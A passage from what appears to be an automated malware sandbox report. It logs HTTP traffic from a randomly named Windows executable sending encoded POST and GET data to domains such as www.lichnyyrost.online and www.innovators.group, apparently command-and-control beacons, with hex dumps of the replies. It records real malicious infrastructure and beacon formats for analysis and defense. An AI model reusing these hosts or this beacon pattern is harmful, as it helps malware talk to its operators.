                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 50 7a 73 4d 6d 4e 45 30 2b 47 6c 2b 5a 37 59 79 57 41 62 6a 74 4a 47 61 4b 73 35 57 32 71 45 2f 6e 52 6a 4d 56 41 61 61 44 56 4b 39 4c 4f 49 47 52 76 70 59 69 55 39 54 61 6b 47 65 65 4b 73 33 33 62 2b 76 56 4c 32 77 2f 75 6e 6a 49 38 6f 6c 4b 6c 64 69 70 50 6b 4d 6a 77 77 55 31 57 48 62 37 4f 6a 55 43 4e 4a 6d 6e 65 48 58 64 2b 46 4f 44 74 6f 6a 35 4f 6e 50 6f 64 4a 39 74 45 6a 6d 64 6d 62 67 6f 41 79 4b 64 70 58 51 46 33 4d 69 30 62 6b 6f 59 78 36 67 7a 4a 6c 6f 56 6d 50 5a 4d 76 41 49 62 32 59 31 42 55 72 56 30 5a 45 76 4b 55 34 64 31 75 57 78 70 36 6f 73 4f 46 68 69 79 35 47 33 74 46 57 42 4a 6b 4b 68 43 33 6f 66 78 34 74 73 37 39 38 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=PzsMmNE0+Gl+Z7YyWAbjtJGaKs5W2qE/nRjMVAaaDVK9LOIGRvpYiU9TakGeeKs33b+vVL2w/unjI8olKldipPkMjwwU1WHb7OjUCNJmneHXd+FODtoj5OnPodJ9tEjmdmbgoAyKdpXQF3Mi0bkoYx6gzJloVmPZMvAIb2Y1BUrV0ZEvKU4d1uWxp6osOFhiy5G3tFWBJkKhC3ofx4ts798=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.293641090 CEST843OUTPOST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 50 7a 73 4d 6d 4e 45 30 2b 47 6c 2b 5a 37 59 79 57 41 62 6a 74 4a 47 61 4b 73 35 57 32 71 45 2f 6e 52 6a 4d 56 41 61 61 44 56 4b 39 4c 4f 49 47 52 76 70 59 69 55 39 54 61 6b 47 65 65 4b 73 33 33 62 2b 76 56 4c 32 77 2f 75 6e 6a 49 38 6f 6c 4b 6c 64 69 70 50 6b 4d 6a 77 77 55 31 57 48 62 37 4f 6a 55 43 4e 4a 6d 6e 65 48 58 64 2b 46 4f 44 74 6f 6a 35 4f 6e 50 6f 64 4a 39 74 45 6a 6d 64 6d 62 67 6f 41 79 4b 64 70 58 51 46 33 4d 69 30 62 6b 6f 59 78 36 67 7a 4a 6c 6f 56 6d 50 5a 4d 76 41 49 62 32 59 31 42 55 72 56 30 5a 45 76 4b 55 34 64 31 75 57 78 70 36 6f 73 4f 46 68 69 79 35 47 33 74 46 57 42 4a 6b 4b 68 43 33 6f 66 78 34 74 73 37 39 38 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=PzsMmNE0+Gl+Z7YyWAbjtJGaKs5W2qE/nRjMVAaaDVK9LOIGRvpYiU9TakGeeKs33b+vVL2w/unjI8olKldipPkMjwwU1WHb7OjUCNJmneHXd+FODtoj5OnPodJ9tEjmdmbgoAyKdpXQF3Mi0bkoYx6gzJloVmPZMvAIb2Y1BUrV0ZEvKU4d1uWxp6osOFhiy5G3tFWBJkKhC3ofx4ts798=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.541191101 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:57 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        Data Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: d1eZko_1fQRERy8G9-E!rwL;i4@E_(Ps.)? ss3='xWV:'QJ(k7G*0Rq_[=9RJ +Xy~86BR]Z=/sbGFdKWV!"vbWwwwMdQlxiM|PJO\D#sd"]".e9}"L2`!ym| `#W;:A4OoyKoN:^5P/{%;W_[;ejV&$&8toUUm3\0vR~g@Em~PYg'hiv$v+u}~tbd,;w:9g9;KJoQr<w~>K|nOx(Xk"uvBmAB`+<PE.~eJG%Mh7WNn(B3w8;Nb4bDuF6?iuj9L1Xm7{Jjvvr@L~`>8ECh?vl:@HYvx$"q;#vY@Jb_`:?m vMrbK1yzH:SR^w<kQe(}lK:}X^i'/5;@&GgMt) @zp78;MSjA'"1yHgU!"]Urb)e6uknxwA [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.541260004 CEST1289INData Raw: 30 c3 b5 f3 e1 ab 8d 13 8d bb da e5 85 26 5d 1f ac 37 42 c6 f4 14 e4 fe 19 79 f0 7e fa 7b 84 c8 e3 f4 cb e4 7b 51 10 ec 9d f4 4b 9d 30 a9 b9 69 81 44 33 3c 73 fe 1a 17 a5 6e 89 20 b6 95 8c c7 a1 d2 a5 df 74 75 39 f7 74 f2 e7 86 03 3f 92 dd 97 98
                                                                                                                                                                                                                        Data Ascii: 0&]7By~{{QK0iD3<sn tu9t?d;,6Io-^`2dPH?|XY,,xHuC+/&\oGz<0]\jds9iN?"f2(-8a{}s7'O
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.541371107 CEST966INData Raw: d7 5d b7 26 aa b2 2a ea b3 b3 91 16 db 7e 08 7d 49 86 83 f1 2f ad e1 5f 53 8b 33 5d e5 f5 e3 01 5a ce 9e 5d a4 3f 8d 66 05 79 f2 4d 0c dc 32 e9 32 cb a4 73 f5 2b ef 6d d7 aa eb d5 ba 68 43 e8 42 b5 69 38 fd cc 8d 86 12 f3 2d 67 45 75 a5 7a 5c 73
                                                                                                                                                                                                                        Data Ascii: ]&*~}I/_S3]Z]?fyM22s+mhCBi8-gEuz\s'3/keg>v/<Kvs"P-.J6&zcrIUiJj&0o)}0!gO:YqyGZzv#L


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        55192.168.11.2049847194.58.112.174805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.513978958 CEST6445OUTPOST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 50 7a 73 4d 6d 4e 45 30 2b 47 6c 2b 5a 37 59 79 57 41 62 6a 74 4a 47 61 4b 73 35 57 32 71 45 2f 6e 52 6a 4d 56 41 61 61 44 56 53 39 4d 38 41 47 41 34 46 59 6a 55 39 54 51 45 47 54 65 4b 74 74 33 62 47 72 56 4c 36 67 2f 73 76 6a 5a 75 51 6c 4d 55 64 69 38 2f 6b 4d 38 41 77 58 71 47 48 30 37 49 44 51 43 4e 35 6d 6e 65 48 58 64 39 4e 4f 4b 63 6f 6a 32 75 6e 4d 76 64 4a 68 70 45 6a 4b 64 6d 43 56 6f 41 48 39 42 4e 6a 51 45 58 63 69 7a 34 4d 6f 51 78 36 69 2f 70 6c 77 56 6d 44 47 4d 76 64 78 62 32 45 50 42 54 50 56 6c 74 5a 70 61 30 45 30 75 64 36 64 68 36 63 6e 48 53 64 38 33 6f 53 4b 72 7a 58 68 58 53 65 47 4c 6e 67 78 6b 4c 6b 6d 67 36 79 52 49 50 45 67 35 6f 70 59 4e 65 54 73 76 6d 57 62 50 39 74 65 6b 50 56 45 4d 31 72 6a 4a 51 4b 4a 47 2f 74 6f 4c 50 45 48 32 77 2f 46 62 4d 49 7a 35 6a 42 43 37 2f 5a 44 30 62 30 6c 65 6a 31 38 6a 47 45 65 37 48 35 57 65 30 43 62 67 58 46 34 79 41 7a 33 45 2f 5a 38 67 51 74 4a 41 70 51 64 43 39 66 4b 33 70 6b 75 39 59 48 61 59 51 42 46 57 41 79 73 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=PzsMmNE0+Gl+Z7YyWAbjtJGaKs5W2qE/nRjMVAaaDVS9M8AGA4FYjU9TQEGTeKtt3bGrVL6g/svjZuQlMUdi8/kM8AwXqGH07IDQCN5mneHXd9NOKcoj2unMvdJhpEjKdmCVoAH9BNjQEXciz4MoQx6i/plwVmDGMvdxb2EPBTPVltZpa0E0ud6dh6cnHSd83oSKrzXhXSeGLngxkLkmg6yRIPEg5opYNeTsvmWbP9tekPVEM1rjJQKJG/toLPEH2w/FbMIz5jBC7/ZD0b0lej18jGEe7H5We0CbgXF4yAz3E/Z8gQtJApQdC9fK3pku9YHaYQBFWAysVHJoh0lCBuUPG1KVzIg+KeVAUiYII/BJTCmmyzP35FFjS5iFsUnN9S+LSUPn93yT25jhk2XeIkH9VeeZKP4GBb0F5z1YXXBb3pJtvJ+kAuXx/J4i8gwW/4jr15UNAdpOozYz2zoBcPP3iiOzzEVYInyuihLRSxbnWdvElZdjhEu7gxQMi5dPymfvigH2OG+g/mNJz2umu76SlSUiIDpUmTQ2hstU5iS2w74rS6ha/Pd9YJ3Xckn5MjOPsFVplqPaUh3i/tcta4KwgltYUFvt/mbaQ6h6ZFBBmW5YzMUs6mc+27jC+zUGSmj22BFjGfnfcKPRJoGB4vYvin6ZaV8Ps3evM8Dp55vTH0AEwrWmcSdX/OUrpN9reajYN9pnX5JFQYOhcsFuCYkAW5yndhKXvd0po7SdTvB0kPjbPu8wg1fB4J5Oif9iFrZaL079H/IjFRi3hTHfpLEiKsd3rrMTF/Lz5dh4xbs7TQIqTigRUR855HvqUyMZh+FCIlO4l8a78XTqTyTexCWyVP0o6Vr9pHH+Z9iMJhsTucHqxC66XxErqZ2QLvxVQkOQIu6VkBoBSdcbmr9OXga9zleaKYvn4l1cQ3o9O7rL7w3ibNt+qu1D6S4Xct4LxfH5/Q0ZqEHZyk5p66s+TTXNFao8/9CgLDvaWbu/ajUnBB [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.772430897 CEST1289OUTData Raw: 66 6d 71 67 70 52 34 36 36 6a 74 36 65 70 73 70 57 4e 68 76 44 4e 30 4a 61 36 57 50 4a 35 4c 6a 4c 62 47 59 54 68 6b 76 69 54 45 51 48 56 47 51 31 67 65 49 48 52 75 6d 63 44 51 78 43 4a 7a 48 68 76 45 4f 45 39 31 63 4e 46 48 77 2f 52 73 4f 69 4d
                                                                                                                                                                                                                        Data Ascii: fmqgpR466jt6epspWNhvDN0Ja6WPJ5LjLbGYThkviTEQHVGQ1geIHRumcDQxCJzHhvEOE91cNFHw/RsOiMZsAxPs+O1EpHguOP3RXVfLqQkHAk9UnJ1N3FocFE/4hYQvHaReiOZS3fTOwStov5JvUhxoPX46BVTsKFy+ausRvMlXVoy2MTxtnDKMdUcArhOtf1cGsGdgwMt/7z0JOklSB1skPD4dYwQc2cW035tJLudR3IPgFiH
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.773272038 CEST258OUTData Raw: 44 64 4b 49 71 45 31 69 42 45 6f 4d 6b 71 72 72 2f 65 72 67 35 79 6f 79 70 61 55 75 38 37 36 41 75 34 69 6c 75 64 2b 2f 2b 6c 49 70 52 61 45 70 59 63 51 54 34 55 6c 66 75 6a 6b 76 77 6b 48 34 52 50 4a 30 76 6f 44 49 2b 41 53 36 6f 67 72 71 72 45
                                                                                                                                                                                                                        Data Ascii: DdKIqE1iBEoMkqrr/erg5yoypaUu876Au4ilud+/+lIpRaEpYcQT4UlfujkvwkH4RPJ0voDI+AS6ogrqrE6Dx7ojq8X24jyCIDpW7LWw3eXTrANgovx/dvtwt2wKDCs3sdruBhwDMmDyKHIKYlALox/7n0NLT1gklBaiMbxCdmB1moxNEZU2Fu8BR0ph9E3MfAwAM3C+kQqXhuh+Q2KDU0IWdKd2O8pB3wm7klfw6+qzMPMUesB
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.773534060 CEST1289INData Raw: 30 c3 b5 f3 e1 ab 8d 13 8d bb da e5 85 26 5d 1f ac 37 42 c6 f4 14 e4 fe 19 79 f0 7e fa 7b 84 c8 e3 f4 cb e4 7b 51 10 ec 9d f4 4b 9d 30 a9 b9 69 81 44 33 3c 73 fe 1a 17 a5 6e 89 20 b6 95 8c c7 a1 d2 a5 df 74 75 39 f7 74 f2 e7 86 03 3f 92 dd 97 98
                                                                                                                                                                                                                        Data Ascii: 0&]7By~{{QK0iD3<sn tu9t?d;,6Io-^`2dPH?|XY,,xHuC+/&\oGz<0]\jds9iN?"f2(-8a{}s7'O
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.773611069 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:59 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        Data Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: d1eZko_1fQRERy8G9-E!rwL;i4@E_(Ps.)? ss3='xWV:'QJ(k7G*0Rq_[=9RJ +Xy~86BR]Z=/sbGFdKWV!"vbWwwwMdQlxiM|PJO\D#sd"]".e9}"L2`!ym| `#W;:A4OoyKoN:^5P/{%;W_[;ejV&$&8toUUm3\0vR~g@Em~PYg'hiv$v+u}~tbd,;w:9g9;KJoQr<w~>K|nOx(Xk"uvBmAB`+<PE.~eJG%Mh7WNn(B3w8;Nb4bDuF6?iuj9L1Xm7{Jjvvr@L~`>8ECh?vl:@HYvx$"q;#vY@Jb_`:?m vMrbK1yzH:SR^w<kQe(}lK:}X^i'/5;@&GgMt) @zp78;MSjA'"1yHgU!"]Urb)e6uknxwA [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.773669004 CEST966INData Raw: d7 5d b7 26 aa b2 2a ea b3 b3 91 16 db 7e 08 7d 49 86 83 f1 2f ad e1 5f 53 8b 33 5d e5 f5 e3 01 5a ce 9e 5d a4 3f 8d 66 05 79 f2 4d 0c dc 32 e9 32 cb a4 73 f5 2b ef 6d d7 aa eb d5 ba 68 43 e8 42 b5 69 38 fd cc 8d 86 12 f3 2d 67 45 75 a5 7a 5c 73
                                                                                                                                                                                                                        Data Ascii: ]&*~}I/_S3]Z]?fyM22s+mhCBi8-gEuz\s'3/keg>v/<Kvs"P-.J6&zcrIUiJj&0o)}0!gO:YqyGZzv#L


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        56192.168.11.2049848194.58.112.174805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.289417028 CEST540OUTGET /3ld1/?Hh=g6BlO&2rul-=CxEsl70ByyFCVrEmQ1H576bbPcYyg9sIwSrFamSzPlGZOs8aE6QFujQOfXywaJwNxcqmSbu90P/WMPRiAk1blYMq9yYTo32NmbjkK65nzP/wEdpsGvsZrfc= HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529087067 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:02 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 35 30 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 69 63 68 6e 79 79 72 6f 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 250e<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.lichnyyrost.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://re [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529145002 CEST1289INData Raw: 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62
                                                                                                                                                                                                                        Data Ascii: nt-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.lichnyyrost.online</h1><p class="b-parking__header-description b-text">
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529207945 CEST1289INData Raw: 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22
                                                                                                                                                                                                                        Data Ascii: m b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compa
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529288054 CEST1289INData Raw: 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                                        Data Ascii: ext-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529335976 CEST1289INData Raw: 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20
                                                                                                                                                                                                                        Data Ascii: _size_large-compact"> </strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a class
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529380083 CEST1289INData Raw: 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d1 8b d0 b9 20 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0
                                                                                                                                                                                                                        Data Ascii: SSL- &nbsp; &nbsp;! , &nbsp;
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529433012 CEST1289INData Raw: 63 72 69 70 74 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 72 65 67 2e 72 75 2f 73 63 72 69 70 74 2f 67 65 74 5f 64 6f 6d 61 69 6e 5f 64 61 74 61 3f 64 6f 6d 61 69 6e 5f 6e 61 6d 65 3d 77 77 77 2e 6c 69 63 68 6e 79 79
                                                                                                                                                                                                                        Data Ascii: cript.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.lichnyyrost.online&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.lichnyyrost.onli
                                                                                                                                                                                                                        Oct 23, 2024 18:57:02.529472113 CEST626INData Raw: 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 66 6f 72 20 28 76 61 72 20 6a 20 3d 20 30 3b 20 6a 20 3c 20 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 2e 6c 65 6e 67 74 68 3b 20 6a 2b 2b 29 20 7b 69 66 20 28 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                        Data Ascii: l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, documen


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        57192.168.11.204984913.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.981944084 CEST817OUTPOST /6fde/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.innovators.group
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
